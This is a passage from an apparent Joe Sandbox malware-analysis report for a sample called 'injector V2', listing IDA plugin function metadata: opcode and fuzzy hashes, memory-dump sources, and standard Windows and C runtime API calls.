                                                                                                                            • Opcode Fuzzy Hash: 67512c5ddbba3dcc724686a72749b8ade885c9fdba3e8d8f4ddba7c24cdba7de
                                                                                                                            • Instruction Fuzzy Hash: D9416776B14600ABF714DA25DC82F3BB7A2EFD5304F18843EE5869B7A0D778AC418749
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 2994545307-2766056989
                                                                                                                            • Opcode ID: 86be3b034137d1e188314dd105af5040d5331b7ecb3c30cf18b9075a44419fda
                                                                                                                            • Instruction ID: cc4d767d31e04a598362a0ea48f62699cf67d2d9896f244bc2d2c3d21d0bb878
                                                                                                                            • Opcode Fuzzy Hash: 86be3b034137d1e188314dd105af5040d5331b7ecb3c30cf18b9075a44419fda
                                                                                                                            • Instruction Fuzzy Hash: 644144B29043009BE7149F54DC85B2BBBF1EF95318F18892DE6891B3A0D3799818C78A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c1639a72b5eed2e40e6d814ef6974f9dda671c7cbd0a27e6298b7e4646378cd3
                                                                                                                            • Instruction ID: 11f07a3e30059be44bd6e7df3787af8c3f4f2cb27c5750cc00ebf60c889a215d
                                                                                                                            • Opcode Fuzzy Hash: c1639a72b5eed2e40e6d814ef6974f9dda671c7cbd0a27e6298b7e4646378cd3
                                                                                                                            • Instruction Fuzzy Hash: 6152353AB08315CFD708CF68E89026AB7E2FB8A314F1A857DC99697351D738D851CB85
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: be27a7aac73bfb8997d25488b34b8cd6715c3106455aa169b4dff54c0d2c9302
                                                                                                                            • Instruction ID: a8e7e146d79dc7b1216ab77788bb456691cb50ed60f4fd9e2b8d6d11bcc3cc2e
                                                                                                                            • Opcode Fuzzy Hash: be27a7aac73bfb8997d25488b34b8cd6715c3106455aa169b4dff54c0d2c9302
                                                                                                                            • Instruction Fuzzy Hash: B4222279A08315CFD708CF78E89066AB7E2FB8A320F1A857DC99587351DB38D815CB85
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 13604fc7b761a7f1690960bab39338f20424a295911265935283642c0471db69
                                                                                                                            • Instruction ID: 13720710fba5054ec50efb2f3f8dab5f3d194269d8f17bbd924e928128f1e485
                                                                                                                            • Opcode Fuzzy Hash: 13604fc7b761a7f1690960bab39338f20424a295911265935283642c0471db69
                                                                                                                            • Instruction Fuzzy Hash: 10713436B107018FD328CF3ACC91666BBE3BFD5314B1DC66DD1928B7A6EA3594068B44
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 979ccd9f37136cabdf795ef1510d182921296494c62843227e038d3ccbc92157
                                                                                                                            • Instruction ID: d5dcacd0e821f3e2e08187deb435845b9dd53913ddd329d744c28078c0de2ee8
                                                                                                                            • Opcode Fuzzy Hash: 979ccd9f37136cabdf795ef1510d182921296494c62843227e038d3ccbc92157
                                                                                                                            • Instruction Fuzzy Hash: C951097164C7545FC724DA28C4906BBB7E2AFCA304F05891EE4DA4B386D239DD46C786
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 58ded9ea482011c4a584ea4d64b17d2d7f0382d6f22de39e55406bea0cd1bec0
                                                                                                                            • Instruction ID: fb36940a0d0d5256c2fb58b70c0601cb38de241cdebaea53ec399ecf97a23e80
                                                                                                                            • Opcode Fuzzy Hash: 58ded9ea482011c4a584ea4d64b17d2d7f0382d6f22de39e55406bea0cd1bec0
                                                                                                                            • Instruction Fuzzy Hash: 4851DE72700B108BC730CE29E8C06A7B7F2EF95314759862ED5A68B792D734EC0987D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ec7ee6b6f774654c01556a802542bcde076e98c98252811fe2adac817a197711
                                                                                                                            • Instruction ID: d9daf018d1bb860a145604cc4e1ee6d71e325b4c3789e383c7d5c426acfa5fcb
                                                                                                                            • Opcode Fuzzy Hash: ec7ee6b6f774654c01556a802542bcde076e98c98252811fe2adac817a197711
                                                                                                                            • Instruction Fuzzy Hash: B1317B71A442006BE710DA15DD82B3BB399DFA9348F0C943EF8C5873A3E235DC11865B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 46330289f148c11a20cee72e3ff718a5a6d8eaa125d5a907a57b0d7d9f1b7300
                                                                                                                            • Instruction ID: 4bac8a1ec2c6fc30c33c130cdc24a0a4640038c07b8f1fa9aa99fbd68c704ae4
                                                                                                                            • Opcode Fuzzy Hash: 46330289f148c11a20cee72e3ff718a5a6d8eaa125d5a907a57b0d7d9f1b7300
                                                                                                                            • Instruction Fuzzy Hash: E731A770745A008BD729CB26D9A1637B392EFA1314F5CDD3EC0971B6A2CA79AC02C749
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6e518638d371761f82305027ffa1a24e3a83fb2ea4523f7a2b9be563667d06e5
                                                                                                                            • Instruction ID: 5bb78b99cbaa4e5610c05ddfd7e3a642798ecd2c1ba3f8dc7eddda7574330468
                                                                                                                            • Opcode Fuzzy Hash: 6e518638d371761f82305027ffa1a24e3a83fb2ea4523f7a2b9be563667d06e5
                                                                                                                            • Instruction Fuzzy Hash: E731B8316082029FD7149E59C880937B7E1EF84358F18893EF899A73E1D739DC52CB4A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1926787176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_400000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            • Opcode ID: 551360aa7d40a4593071d730eb62f88cbe2e1745555d5001db6423c849b2951d
                                                                                                                            • Instruction ID: d66948b9bb3eb5f7c51602a94af9291b04aff53dfaa3fc388252a078ccb33eff
                                                                                                                            • Opcode Fuzzy Hash: 551360aa7d40a4593071d730eb62f88cbe2e1745555d5001db6423c849b2951d
                                                                                                                            • Instruction Fuzzy Hash: BA2179B5B047009FE7148E94DCC1B7BB7A1FBCA304F24813DEA91D73A1D6B859818759
                                                                                                                            APIs
                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 00B526E2
                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 00B527F0
                                                                                                                            • CatchIt.LIBVCRUNTIME ref: 00B52841
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00B52942
                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 00B5295D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 4119006552-393685449
                                                                                                                            • Opcode ID: 2bdcb8ccc59f528826b422666d78671f02c3ac73dba88527aef0c7ace8a97b52
                                                                                                                            • Instruction ID: 45a4c17138b49329cb54cc857b4d2e34239410fffe1e70bf8a685df44acc8902
                                                                                                                            • Opcode Fuzzy Hash: 2bdcb8ccc59f528826b422666d78671f02c3ac73dba88527aef0c7ace8a97b52
                                                                                                                            • Instruction Fuzzy Hash: 2FB138318022099FCF19DFA4C881AAEBBF5FF19316F1441E9EC116B212D731EA59DB91
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __freea$__alloca_probe_16$Info
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 127012223-0
                                                                                                                            • Opcode ID: 0447742c2b698f47873432dcdd49fc57277fe89d1e32482df5cfc4ebc8661ca4
                                                                                                                            • Instruction ID: ef56e744ecc62a0cdb393fb7d56e5de3f10b317e78d9dbf0201db979e886ab86
                                                                                                                            • Opcode Fuzzy Hash: 0447742c2b698f47873432dcdd49fc57277fe89d1e32482df5cfc4ebc8661ca4
                                                                                                                            • Instruction Fuzzy Hash: B47101729007056ADF219F648C81BAE7BFAEF5531AF2800D9ED14B7281D731DDC887A1
                                                                                                                            APIs
                                                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 00B44997
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___std_exception_copy
                                                                                                                            • String ID: (^Hx$(^Hx$(^Hx
                                                                                                                            • API String ID: 2659868963-1348055467
                                                                                                                            • Opcode ID: e7ab19fc00a675cc0460a21f5787312162d33fd94931c8af76f0f6e8addad2a7
                                                                                                                            • Instruction ID: 6f58e69f9acafb190962dc9b945ee23934eec273c76a039be9a21e7f5379995f
                                                                                                                            • Opcode Fuzzy Hash: e7ab19fc00a675cc0460a21f5787312162d33fd94931c8af76f0f6e8addad2a7
                                                                                                                            • Instruction Fuzzy Hash: 24811B362043005F8B24DA29A9C833E72D1E798321F7C8AD5E5A1CB7E1EF75CA54B742
                                                                                                                            APIs
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00B4C9A9,?,00B2782F,00000000,00000000), ref: 00B4C95B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeLibrary
                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                            • Opcode ID: 480a960c1a1e2f9d003609983796ca108e9d7d45f0b39af801e2731a75a18c06
                                                                                                                            • Instruction ID: e78ad31aadc7077bf82e3991a8323a17f6b405207be3a1e0dd368f393e601a96
                                                                                                                            • Opcode Fuzzy Hash: 480a960c1a1e2f9d003609983796ca108e9d7d45f0b39af801e2731a75a18c06
                                                                                                                            • Instruction Fuzzy Hash: B021D531A06311BBD7629F68DC80B5A3FE9EB45BA1F1405E0E815A7291DB30EF00E6D1
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32(?,?,00B4C135,00B49C1D,00B49814), ref: 00B4C14C
                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B4C15A
                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B4C173
                                                                                                                            • SetLastError.KERNEL32(00000000,00B4C135,00B49C1D,00B49814), ref: 00B4C1C5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3852720340-0
                                                                                                                            • Opcode ID: 8743e1b21195abc100e3127bd03bc75bdcf62cebe8cbbd6cad65db3cd73eee70
                                                                                                                            • Instruction ID: b2520602d1ed2a7e875443044bea62556673610a05484073213e86828acfb73e
                                                                                                                            • Opcode Fuzzy Hash: 8743e1b21195abc100e3127bd03bc75bdcf62cebe8cbbd6cad65db3cd73eee70
                                                                                                                            • Instruction Fuzzy Hash: D701D83210A7116DB66527B56CC5F263FD4CB11F7B72003FAF524660E2EE514D057594
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: string too long$eIY$eIY$eIY
                                                                                                                            • API String ID: 0-1759105153
                                                                                                                            • Opcode ID: 8bfbc5a3a0a90429a666a28c06245bd3debad346119aa750c190e8280aeff039
                                                                                                                            • Instruction ID: d9afd177c426faec93623f18da094c4209e4a4c3d86f08d877b01ec17a471646
                                                                                                                            • Opcode Fuzzy Hash: 8bfbc5a3a0a90429a666a28c06245bd3debad346119aa750c190e8280aeff039
                                                                                                                            • Instruction Fuzzy Hash: 1521562330426197AE280A2CF88522E3AC38AE17B0F3A45EAD4196F256C637CCD59252
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,?,00B563AE,000000FF), ref: 00B4A95A
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B4A96C
                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00B563AE,000000FF), ref: 00B4A98E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                            • Opcode ID: 2f298a5ae5b9a4433df680da809e6894f8bb14610e5485a68d845eabd7adc129
                                                                                                                            • Instruction ID: 24203e575b2ee8810862d8aabf323c60fa59f5a16aed9dcb0b7edf1ccdef18fd
                                                                                                                            • Opcode Fuzzy Hash: 2f298a5ae5b9a4433df680da809e6894f8bb14610e5485a68d845eabd7adc129
                                                                                                                            • Instruction Fuzzy Hash: 5301A271950719AFDB128F54DC09BAEBBF8FB44B16F0402A9E811A36E0EB749904CA90
                                                                                                                            APIs
                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00B50F0D
                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00B50FD6
                                                                                                                            • __freea.LIBCMT ref: 00B5103D
                                                                                                                              • Part of subcall function 00B4EB9B: HeapAlloc.KERNEL32(00000000,00B276E8,?,?,00B276E8,01E84800), ref: 00B4EBCD
                                                                                                                            • __freea.LIBCMT ref: 00B51050
                                                                                                                            • __freea.LIBCMT ref: 00B5105D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1096550386-0
                                                                                                                            • Opcode ID: d98721fd5ca2e3b851e00c9b5dac70bd5c13ffed10352ae3b2d83271b9be267c
                                                                                                                            • Instruction ID: 1f6971281628d21f245d5bcfc780716d454275995275f21cbc0fd42626e7dee7
                                                                                                                            • Opcode Fuzzy Hash: d98721fd5ca2e3b851e00c9b5dac70bd5c13ffed10352ae3b2d83271b9be267c
                                                                                                                            • Instruction Fuzzy Hash: 3651E672600256AFDB206F68CC81FBB7BE9EF44712F1908E9FD04D6181EB74DD889660
                                                                                                                            APIs
                                                                                                                            • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B528EE,?,?,00000000,00000000,00000000,?), ref: 00B52A0D
                                                                                                                            • CatchIt.LIBVCRUNTIME ref: 00B52AF3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CatchEncodePointer
                                                                                                                            • String ID: MOC$RCC
                                                                                                                            • API String ID: 1435073870-2084237596
                                                                                                                            • Opcode ID: b6e4811d408807bed3f8830c7fec5037f6a5ed9b320c6411333118b744deacbc
                                                                                                                            • Instruction ID: e7116953e758f5c15904211e6723982d2739256a9870b911120c3226cebb4c9b
                                                                                                                            • Opcode Fuzzy Hash: b6e4811d408807bed3f8830c7fec5037f6a5ed9b320c6411333118b744deacbc
                                                                                                                            • Instruction Fuzzy Hash: 9F414671A01209AFDF25CF98C981AAEBBF5FF09305F1880D9FA0467222E3359A55DB50
                                                                                                                            APIs
                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 00B50C2F
                                                                                                                            • GetLastError.KERNEL32 ref: 00B50C39
                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00B50C61
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                            • String ID: api-ms-
                                                                                                                            • API String ID: 3177248105-2084034818
                                                                                                                            • Opcode ID: 0c7c7178fa36047d768fd465e6ab4c591f52bdd8015f917f024d956a15e0a438
                                                                                                                            • Instruction ID: e7ef1ec7c678c422d43911c49b3d9fb70e400363d08cc35714257f308a0f70a9
                                                                                                                            • Opcode Fuzzy Hash: 0c7c7178fa36047d768fd465e6ab4c591f52bdd8015f917f024d956a15e0a438
                                                                                                                            • Instruction Fuzzy Hash: 3FE01A30680308BAEA212BA5ED46B1A3F9AEB01B42F1040E0FD0CAC0A1EBA299559584
                                                                                                                            APIs
                                                                                                                            • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00B515E2
                                                                                                                              • Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F
                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B51834
                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00B5187A
                                                                                                                            • GetLastError.KERNEL32 ref: 00B5191D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.1928296748.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.1927416839.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929283933.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929311997.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929340707.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.1929369279.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2112829910-0
